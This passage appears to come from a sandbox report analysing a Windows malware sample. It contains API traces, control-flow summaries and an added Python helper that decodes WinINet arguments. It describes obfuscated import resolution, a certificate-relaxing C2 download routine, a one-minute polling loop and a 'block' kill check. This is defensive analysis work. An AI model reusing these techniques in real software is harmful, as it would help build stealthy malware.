                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 0011fb4f2055730ef30bc980c491acba2c743a7ad7d8eb2e3ce60421f6d509d4
                  • Instruction ID: 0e1ca9d6ee6f7413b388f95b2c99b4b16f1ff373fcd018a324f0db53abb1d830
                  • Opcode Fuzzy Hash: 0011fb4f2055730ef30bc980c491acba2c743a7ad7d8eb2e3ce60421f6d509d4
                  • Instruction Fuzzy Hash: 83D017749002089BCB149AA0A849ADDBB78FB08211F000668D90A62240EA3164828BA5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 fc9c10-fc9c1a 634 fca036-fca0ca LoadLibraryA * 8 633->634 635 fc9c20-fca031 GetProcAddress * 43 633->635 636 fca0cc-fca141 GetProcAddress * 5 634->636 637 fca146-fca14d 634->637 635->634 636->637 638 fca216-fca21d 637->638 639 fca153-fca211 GetProcAddress * 8 637->639 640 fca21f-fca293 GetProcAddress * 5 638->640 641 fca298-fca29f 638->641 639->638 640->641 642 fca2a5-fca332 GetProcAddress * 6 641->642 643 fca337-fca33e 641->643 642->643 644 fca41f-fca426 643->644 645 fca344-fca41a GetProcAddress * 9 643->645 646 fca428-fca49d GetProcAddress * 5 644->646 647 fca4a2-fca4a9 644->647 645->644 646->647 648 fca4dc-fca4e3 647->648 649 fca4ab-fca4d7 GetProcAddress * 2 647->649 650 fca515-fca51c 648->650 651 fca4e5-fca510 GetProcAddress * 2 648->651 649->648 652 fca612-fca619 650->652 653 fca522-fca60d GetProcAddress * 10 650->653 651->650 654 fca67d-fca684 652->654 655 fca61b-fca678 GetProcAddress * 4 652->655 653->652 656 fca69e-fca6a5 654->656 657 fca686-fca699 GetProcAddress 654->657 655->654 658 fca708-fca709 656->658 659 fca6a7-fca703 GetProcAddress * 4 656->659 657->656 659->658
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,00C75C30), ref: 00FC9C2D
                  • GetProcAddress.KERNEL32(74DD0000,00C75B50), ref: 00FC9C45
                  • GetProcAddress.KERNEL32(74DD0000,00C89430), ref: 00FC9C5E
                  • GetProcAddress.KERNEL32(74DD0000,00C89340), ref: 00FC9C76
                  • GetProcAddress.KERNEL32(74DD0000,00C89448), ref: 00FC9C8E
                  • GetProcAddress.KERNEL32(74DD0000,00C89460), ref: 00FC9CA7
                  • GetProcAddress.KERNEL32(74DD0000,00C7B9A0), ref: 00FC9CBF
                  • GetProcAddress.KERNEL32(74DD0000,00C8D4B8), ref: 00FC9CD7
                  • GetProcAddress.KERNEL32(74DD0000,00C8D428), ref: 00FC9CF0
                  • GetProcAddress.KERNEL32(74DD0000,00C8D578), ref: 00FC9D08
                  • GetProcAddress.KERNEL32(74DD0000,00C8D518), ref: 00FC9D20
                  • GetProcAddress.KERNEL32(74DD0000,00C75D30), ref: 00FC9D39
                  • GetProcAddress.KERNEL32(74DD0000,00C75B70), ref: 00FC9D51
                  • GetProcAddress.KERNEL32(74DD0000,00C75D10), ref: 00FC9D69
                  • GetProcAddress.KERNEL32(74DD0000,00C75B90), ref: 00FC9D82
                  • GetProcAddress.KERNEL32(74DD0000,00C8D410), ref: 00FC9D9A
                  • GetProcAddress.KERNEL32(74DD0000,00C8D458), ref: 00FC9DB2
                  • GetProcAddress.KERNEL32(74DD0000,00C7B5E0), ref: 00FC9DCB
                  • GetProcAddress.KERNEL32(74DD0000,00C75CB0), ref: 00FC9DE3
                  • GetProcAddress.KERNEL32(74DD0000,00C8D5A8), ref: 00FC9DFB
                  • GetProcAddress.KERNEL32(74DD0000,00C8D440), ref: 00FC9E14
                  • GetProcAddress.KERNEL32(74DD0000,00C8D590), ref: 00FC9E2C
                  • GetProcAddress.KERNEL32(74DD0000,00C8D4E8), ref: 00FC9E44
                  • GetProcAddress.KERNEL32(74DD0000,00C75E30), ref: 00FC9E5D
                  • GetProcAddress.KERNEL32(74DD0000,00C8D500), ref: 00FC9E75
                  • GetProcAddress.KERNEL32(74DD0000,00C8D470), ref: 00FC9E8D
                  • GetProcAddress.KERNEL32(74DD0000,00C8D3F8), ref: 00FC9EA6
                  • GetProcAddress.KERNEL32(74DD0000,00C8D488), ref: 00FC9EBE
                  • GetProcAddress.KERNEL32(74DD0000,00C8D4A0), ref: 00FC9ED6
                  • GetProcAddress.KERNEL32(74DD0000,00C8D560), ref: 00FC9EEF
                  • GetProcAddress.KERNEL32(74DD0000,00C8D4D0), ref: 00FC9F07
                  • GetProcAddress.KERNEL32(74DD0000,00C8D530), ref: 00FC9F1F
                  • GetProcAddress.KERNEL32(74DD0000,00C8D548), ref: 00FC9F38
                  • GetProcAddress.KERNEL32(74DD0000,00C8A570), ref: 00FC9F50
                  • GetProcAddress.KERNEL32(74DD0000,00C8CE40), ref: 00FC9F68
                  • GetProcAddress.KERNEL32(74DD0000,00C8D0B0), ref: 00FC9F81
                  • GetProcAddress.KERNEL32(74DD0000,00C75E50), ref: 00FC9F99
                  • GetProcAddress.KERNEL32(74DD0000,00C8CE88), ref: 00FC9FB1
                  • GetProcAddress.KERNEL32(74DD0000,00C75970), ref: 00FC9FCA
                  • GetProcAddress.KERNEL32(74DD0000,00C8CF48), ref: 00FC9FE2
                  • GetProcAddress.KERNEL32(74DD0000,00C8CFC0), ref: 00FC9FFA
                  • GetProcAddress.KERNEL32(74DD0000,00C757D0), ref: 00FCA013
                  • GetProcAddress.KERNEL32(74DD0000,00C758B0), ref: 00FCA02B
                  • LoadLibraryA.KERNEL32(00C8CF78,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA03D
                  • LoadLibraryA.KERNEL32(00C8CFD8,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA04E
                  • LoadLibraryA.KERNEL32(00C8CEE8,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA060
                  • LoadLibraryA.KERNEL32(00C8CDF8,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA072
                  • LoadLibraryA.KERNEL32(00C8CF60,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA083
                  • LoadLibraryA.KERNEL32(00C8CF18,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA095
                  • LoadLibraryA.KERNEL32(00C8CE28,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA0A7
                  • LoadLibraryA.KERNEL32(00C8CF90,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA0B8
                  • GetProcAddress.KERNEL32(75290000,00C75810), ref: 00FCA0DA
                  • GetProcAddress.KERNEL32(75290000,00C8CE10), ref: 00FCA0F2
                  • GetProcAddress.KERNEL32(75290000,00C89068), ref: 00FCA10A
                  • GetProcAddress.KERNEL32(75290000,00C8CE58), ref: 00FCA123
                  • GetProcAddress.KERNEL32(75290000,00C757F0), ref: 00FCA13B
                  • GetProcAddress.KERNEL32(6FDD0000,00C7B798), ref: 00FCA160
                  • GetProcAddress.KERNEL32(6FDD0000,00C75870), ref: 00FCA179
                  • GetProcAddress.KERNEL32(6FDD0000,00C7B608), ref: 00FCA191
                  • GetProcAddress.KERNEL32(6FDD0000,00C8D038), ref: 00FCA1A9
                  • GetProcAddress.KERNEL32(6FDD0000,00C8D0C8), ref: 00FCA1C2
                  • GetProcAddress.KERNEL32(6FDD0000,00C75910), ref: 00FCA1DA
                  • GetProcAddress.KERNEL32(6FDD0000,00C759B0), ref: 00FCA1F2
                  • GetProcAddress.KERNEL32(6FDD0000,00C8CF00), ref: 00FCA20B
                  • GetProcAddress.KERNEL32(752C0000,00C75A10), ref: 00FCA22C
                  • GetProcAddress.KERNEL32(752C0000,00C75990), ref: 00FCA244
                  • GetProcAddress.KERNEL32(752C0000,00C8CFA8), ref: 00FCA25D
                  • GetProcAddress.KERNEL32(752C0000,00C8D098), ref: 00FCA275
                  • GetProcAddress.KERNEL32(752C0000,00C75710), ref: 00FCA28D
                  • GetProcAddress.KERNEL32(74EC0000,00C7B680), ref: 00FCA2B3
                  • GetProcAddress.KERNEL32(74EC0000,00C7B6D0), ref: 00FCA2CB
                  • GetProcAddress.KERNEL32(74EC0000,00C8CEB8), ref: 00FCA2E3
                  • GetProcAddress.KERNEL32(74EC0000,00C756D0), ref: 00FCA2FC
                  • GetProcAddress.KERNEL32(74EC0000,00C759D0), ref: 00FCA314
                  • GetProcAddress.KERNEL32(74EC0000,00C7B7C0), ref: 00FCA32C
                  • GetProcAddress.KERNEL32(75BD0000,00C8D0E0), ref: 00FCA352
                  • GetProcAddress.KERNEL32(75BD0000,00C75930), ref: 00FCA36A
                  • GetProcAddress.KERNEL32(75BD0000,00C89098), ref: 00FCA382
                  • GetProcAddress.KERNEL32(75BD0000,00C8D020), ref: 00FCA39B
                  • GetProcAddress.KERNEL32(75BD0000,00C8CED0), ref: 00FCA3B3
                  • GetProcAddress.KERNEL32(75BD0000,00C75730), ref: 00FCA3CB
                  • GetProcAddress.KERNEL32(75BD0000,00C75950), ref: 00FCA3E4
                  • GetProcAddress.KERNEL32(75BD0000,00C8CE70), ref: 00FCA3FC
                  • GetProcAddress.KERNEL32(75BD0000,00C8CFF0), ref: 00FCA414
                  • GetProcAddress.KERNEL32(75A70000,00C758D0), ref: 00FCA436
                  • GetProcAddress.KERNEL32(75A70000,00C8CF30), ref: 00FCA44E
                  • GetProcAddress.KERNEL32(75A70000,00C8D008), ref: 00FCA466
                  • GetProcAddress.KERNEL32(75A70000,00C8D050), ref: 00FCA47F
                  • GetProcAddress.KERNEL32(75A70000,00C8CEA0), ref: 00FCA497
                  • GetProcAddress.KERNEL32(75450000,00C759F0), ref: 00FCA4B8
                  • GetProcAddress.KERNEL32(75450000,00C75A30), ref: 00FCA4D1
                  • GetProcAddress.KERNEL32(75DA0000,00C758F0), ref: 00FCA4F2
                  • GetProcAddress.KERNEL32(75DA0000,00C8D068), ref: 00FCA50A
                  • GetProcAddress.KERNEL32(6F070000,00C75A50), ref: 00FCA530
                  • GetProcAddress.KERNEL32(6F070000,00C75890), ref: 00FCA548
                  • GetProcAddress.KERNEL32(6F070000,00C75A70), ref: 00FCA560
                  • GetProcAddress.KERNEL32(6F070000,00C8D080), ref: 00FCA579
                  • GetProcAddress.KERNEL32(6F070000,00C75A90), ref: 00FCA591
                  • GetProcAddress.KERNEL32(6F070000,00C75830), ref: 00FCA5A9
                  • GetProcAddress.KERNEL32(6F070000,00C75750), ref: 00FCA5C2
                  • GetProcAddress.KERNEL32(6F070000,00C756B0), ref: 00FCA5DA
                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00FCA5F1
                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00FCA607
                  • GetProcAddress.KERNEL32(75AF0000,00C8D308), ref: 00FCA629
                  • GetProcAddress.KERNEL32(75AF0000,00C89078), ref: 00FCA641
                  • GetProcAddress.KERNEL32(75AF0000,00C8D170), ref: 00FCA659
                  • GetProcAddress.KERNEL32(75AF0000,00C8D188), ref: 00FCA672
                  • GetProcAddress.KERNEL32(75D90000,00C756F0), ref: 00FCA693
                  • GetProcAddress.KERNEL32(6E330000,00C8D3E0), ref: 00FCA6B4
                  • GetProcAddress.KERNEL32(6E330000,00C75770), ref: 00FCA6CD
                  • GetProcAddress.KERNEL32(6E330000,00C8D2F0), ref: 00FCA6E5
                  • GetProcAddress.KERNEL32(6E330000,00C8D0F8), ref: 00FCA6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: d2642b652b4baf44aad9eab66d6ad995b910738784057efdb7c84a050902d041
                  • Instruction ID: 374c07b6b46ec172802d9d7f9983b42979c41e2758c9cda8f62d052575212c01
                  • Opcode Fuzzy Hash: d2642b652b4baf44aad9eab66d6ad995b910738784057efdb7c84a050902d041
                  • Instruction Fuzzy Hash: 52621AB5500A01AFC36CDBA9F598D5637F9EF8C242714863EA62EC324CD67EA4C1DB50

                  Control-flow Graph

                  The graph is an image in the report (legend: executed / not executed blocks); its flattened node and edge list is replaced here by a walk of the basic blocks it encodes:
                  • fb6280: subcalls fca7a0 (lstrcpy), fb47b0 (lstrlen + InternetCrackUrlA, which splits the request URL into host and path) and fca740 (lstrcpy), then InternetOpenA and a StrCmpCA on the result
                  • fb631e: InternetConnectA; one edge continues at fb6348, the other goes straight to the InternetCloseHandle at fb64ff (session handle) and returns through fb6509
                  • fb6364: HttpOpenRequestA with the GET verb; the edge that skips the request goes to the InternetCloseHandle at fb64f5 (connection handle)
                  • fb639e: InternetSetOptionA, reached only from the test at fb6398 (option 0x1F is INTERNET_OPTION_SECURITY_FLAGS, written with a 4-byte value)
                  • fb63c5: HttpSendRequestA then HttpQueryInfoA (0x13 = HTTP_QUERY_STATUS_CODE, 0x100-byte buffer); fb6407 is the error exit (fca740, two fca800) when the query fails, otherwise fc8940 at fb642c evaluates the status and chooses between the read loop and the second error exit at fb64c9
                  • fb6456: InternetReadFile into a 0x7CF (1999) byte buffer; fb648d appends each chunk with fca9b0 (lstrlen/lstrcpy/lstrcat) and fca8a0, frees with fca800, and loops back to fb6456 until no data is returned
                  • fb64c7, fb64f5, fb64ff: the three InternetCloseHandle calls release request, connection and session in turn before the common return block fb6528
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                    • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
                  • StrCmpCA.SHLWAPI(?,00C8EAA8), ref: 00FB6303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
                  • HttpOpenRequestA.WININET(00000000,GET,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB6385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FB63D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00FB63FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FB646D
                  • InternetCloseHandle.WININET(00000000), ref: 00FB64EF
                  • InternetCloseHandle.WININET(00000000), ref: 00FB64F9
                  • InternetCloseHandle.WININET(00000000), ref: 00FB6503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: the same fourteen .sdmp regions listed under the preceding function entries
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: 5fa7e091fc63e480b30b2cb6c74d33468b877813fcd4f175647735efb88bbe32
                  • Instruction ID: 910dbc133d20dedb80586d88d6c6fb1adb3fb88b228db10e67c409018384e9a2
                  • Opcode Fuzzy Hash: 5fa7e091fc63e480b30b2cb6c74d33468b877813fcd4f175647735efb88bbe32
                  • Instruction Fuzzy Hash: A1713C71A00218EBDB24DBA0DC49FEE7778BF44704F1081A9F10AAB1C4DBB96A85DF51
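The two API lists above (the pointer-named GetProcAddress resolver, and the WinINet download routine at 00FB6280) are easier to read once the numeric arguments are turned into symbols. The Python below is an added example written for this edit, not code from the report or from the sample. It parses lines in the report's own trace format (a subset copied into TRACE, bullets removed), groups the GetProcAddress calls by module base so the obfuscated-name resolution stands out, and decodes the WinINet access-type, service, flag, option, query-level and buffer-size arguments, plus the Sleep interval of the retry loop, with the public wininet.h / winbase.h constants. It infers only the module identity the trace pins (6F070000 exports InternetSetOptionA and HttpQueryInfoA, so it is wininet.dll); the other bases are left unnamed because the report does not list them.

```python
# Added example, not from the report or the sample: parse the report's 'APIs' trace lines,
# rebuild the dynamic-import map from the GetProcAddress trace, and decode the numeric
# WinINet / Sleep arguments of the C2 download routine into the public SDK symbols.
import re
from collections import defaultdict

# Lines copied from this report (bullets removed); a representative subset.
TRACE = """
LoadLibraryA.KERNEL32(00C8CF90,?,00FC5CA3,00FD0AEB,?,?,?,?,?,?,?,?,?,?,00FD0AEA,00FD0AE3), ref: 00FCA0B8
GetProcAddress.KERNEL32(75290000,00C75810), ref: 00FCA0DA
GetProcAddress.KERNEL32(6F070000,00C75A50), ref: 00FCA530
GetProcAddress.KERNEL32(6F070000,00C756B0), ref: 00FCA5DA
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00FCA5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00FCA607
InternetOpenA.WININET(00FD0DFE,00000001,00000000,00000000,00000000), ref: 00FB62E1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB6335
HttpOpenRequestA.WININET(00000000,GET,?,00C8E368,00000000,00000000,00400100,00000000), ref: 00FB6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FB63BF
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00FB63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FB646D
Sleep.KERNEL32(0000EA60), ref: 00FC5A1B
ExitProcess.KERNEL32 ref: 00FC17D1
"""
# Api.MODULE(arg,...), ref: XXXXXXXX   (argument list optional, see the ExitProcess line)
CALL_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-F]{8})")
PTR = re.compile(r"^[0-9A-F]{8}$")  # 8 hex digits: a pointer or a plain numeric argument

def parse_trace(text):
    """(api, module, [raw args], ref) for every trace entry in text."""
    calls = []
    for m in CALL_RE.finditer(text):
        api, mod, args, ref = m.groups()
        calls.append((api, mod, [a.strip() for a in args.split(",")] if args else [], ref))
    return calls

def dynamic_imports(calls):
    """Group GetProcAddress by module base. An 8-hex-digit name is a pointer to a string
    the sample builds at run time (not rendered by the plugin); anything else is a
    clear-text export name, which also pins the module (these two are wininet.dll)."""
    table = defaultdict(lambda: {"resolved": 0, "clear_names": []})
    for api, _mod, args, _ref in calls:
        if api == "GetProcAddress" and len(args) == 2:
            table[args[0]]["resolved"] += 1
            if not PTR.match(args[1]):
                table[args[0]]["clear_names"].append(args[1])
    return dict(table)

# wininet.h / winbase.h values (subsets)
INTERNET_FLAGS = {0x80000000: "RELOAD", 0x04000000: "NO_CACHE_WRITE", 0x00800000: "SECURE",
                  0x00400000: "KEEP_CONNECTION", 0x00200000: "NO_AUTO_REDIRECT",
                  0x00080000: "NO_COOKIES", 0x00002000: "IGNORE_CERT_DATE_INVALID",
                  0x00001000: "IGNORE_CERT_CN_INVALID", 0x00000100: "PRAGMA_NOCACHE"}
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
OPTION = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 6: "INTERNET_OPTION_RECEIVE_TIMEOUT",
          31: "INTERNET_OPTION_SECURITY_FLAGS", 41: "INTERNET_OPTION_USER_AGENT"}
QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE", 22: "HTTP_QUERY_RAW_HEADERS_CRLF"}

def decode_flags(value, table, prefix):
    """Greedy bit decomposition of a flag word; bits not in the table are left as hex."""
    names, rest = [], value
    for bit, name in sorted(table.items(), reverse=True):
        if rest & bit:
            names.append(prefix + name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")
    return "|".join(names) or "0"

# (api, zero-based argument index) -> renderer for that argument
DECODERS = {
    ("InternetOpenA", 1): lambda v: OPEN_TYPE.get(v, f"0x{v:X}"),
    ("InternetConnectA", 5): lambda v: SERVICE.get(v, f"0x{v:X}"),
    ("HttpOpenRequestA", 6): lambda v: decode_flags(v, INTERNET_FLAGS, "INTERNET_FLAG_"),
    ("InternetSetOptionA", 1): lambda v: OPTION.get(v, f"0x{v:X}"),
    ("HttpQueryInfoA", 1): lambda v: QUERY.get(v & 0xFFFF, f"0x{v:X}"),
    ("InternetReadFile", 2): lambda v: f"{v}-byte buffer",
    ("Sleep", 0): lambda v: f"{v} ms",
}

def annotate(calls):
    """ref -> 'Api(arg, ...)' with decodable numeric arguments replaced by their symbols;
    '?' (not recovered by the plugin) and string arguments are kept verbatim."""
    out = {}
    for api, _mod, args, ref in calls:
        shown = [DECODERS[(api, i)](int(raw, 16)) if (api, i) in DECODERS and PTR.match(raw) else raw
                 for i, raw in enumerate(args)]
        out[ref] = f"{api}({', '.join(shown)})"
    return out

if __name__ == "__main__":
    calls = parse_trace(TRACE)
    for base, info in dynamic_imports(calls).items():
        print(base, info["resolved"], "resolved;", info["clear_names"] or "no clear-text names")
    print(*annotate(calls).values(), sep="\n")
```

Run as a script it prints one line per module base (6F070000: four imports, two of them in clear text) and the decoded calls: HttpOpenRequestA with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, InternetSetOptionA with INTERNET_OPTION_SECURITY_FLAGS (the option a client uses to relax certificate checking; the 4-byte value is shown as ? in the trace, so which SECURITY_FLAG_IGNORE_* bits are set is not known from this report), HttpQueryInfoA with HTTP_QUERY_STATUS_CODE, a 1999-byte InternetReadFile buffer, and the 60 000 ms Sleep of the retry loop. Feeding it the full API lists of the report instead of the subset needs no change to the parser.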

                  Control-flow Graph

                  The graph is an image in the report (legend: executed / not executed blocks); its flattened node and edge list is replaced here by the structure it encodes:
                  • fc5510: entry; set-up through fc5ad0, three fca820 (lstrlen + lstrcpy) and four fca740 (lstrcpy) calls, then the loop head at fc557c
                  • Three rounds of the same shape follow, entered at fc557c, fc56af and fc5865. Each round takes one of two paths: fca820 + fca7a0, fb1590, fc51f0 (fc5585, fc56c5, fc587b), or two fca740, fb1590, fc52c0, fca8a0, fca800 and a StrCmpCA against "ERROR" (fc55d7, fc571e, fc58d3; refs 00FC5644, 00FC578B, 00FC5940), optionally followed by another fca7a0, fb1590, fc51f0 step (fc564e, fc5795, fc594a). fc51f0 and fc52c0 both compare their own result with "ERROR", and fc52c0 also searches it with StrStrA
                  • Every round ends in fcaad0 + StrCmpCA against "ERROR" (fc5693, fc57da, fc598f; refs 00FC56A1, 00FC5857, 00FC5A0C). One edge of each comparison leads to a finalise-and-return block (fc57dc, fc5991, fc5a28: fca8a0, two fca820, fb1670, four fca800, fc6560, fb1550, then the return at fc5ac3); the other edge continues
                  • After the third comparison the continuing edge is Sleep(0xEA60) = 60 000 ms at fc5a16, which jumps back to fc557c, so the whole sequence is repeated once a minute until a comparison takes the finalising edge
                  APIs
                    • Part of subcall function 00FCA820: lstrlen.KERNEL32(00FB4F05,?,?,00FB4F05,00FD0DDE), ref: 00FCA82B
                    • Part of subcall function 00FCA820: lstrcpy.KERNEL32(00FD0DDE,00000000), ref: 00FCA885
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC56A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5857
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FC51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5228
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5318
                    • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC532F
                    • Part of subcall function 00FC52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00FC5364
                    • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC5383
                    • Part of subcall function 00FC52C0: lstrlen.KERNEL32(00000000), ref: 00FC53AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FC5940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FC5A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00FC5A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: the same fourteen .sdmp regions listed under the preceding function entries
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 87c8293d430d93d12cda99f0dcf9cd6edf976be8d4e4790d9a45ef6d2894e754
                  • Instruction ID: 784de1447d2df7fed72fe1cd410ff1acad1d06a224a891ccbd3827cf0b66bc58
                  • Opcode Fuzzy Hash: 87c8293d430d93d12cda99f0dcf9cd6edf976be8d4e4790d9a45ef6d2894e754
                  • Instruction Fuzzy Hash: 1AE13E729101099BCB18FBA0EE57FED7338AF54704F44812CA416571D5EF38BA49EBA2

                  Control-flow Graph

                  The graph is an image in the report (legend: executed / not executed blocks); its flattened node and edge list is replaced here by the structure it encodes:
                  • fc17a0: fcaad0, then StrCmpCA against "block" (ref 00FC17C5); a match goes to fc17cf and ExitProcess, so a "block" value in the parsed input terminates the process
                  • fc17d7 / fc17f4: loop head; fc19c2 (fca800) is the exit when the input is exhausted, fc17fe leads into the body at fc1817
                  • fc1817: a thirteen-way dispatch made of nine further StrCmpCA comparisons (fc185d, fc187f, fc18ad, fc18cf, fc18f1, fc1913, fc1932, fc1951, fc1970) and four fca820 (lstrlen + lstrcpy) assignments (fc1821, fc1835, fc1849, fc198f). Only the "block" string is visible to the plugin; the other comparison operands are not string literals, and the API list for this function shows only the first comparison. Every arm rejoins at fc199e, which advances to the next element and returns to fc17f4
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00FC17C5
                  • ExitProcess.KERNEL32 ref: 00FC17D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: the same fourteen .sdmp regions listed under the preceding function entries
                  Joe Sandbox IDA Plugin
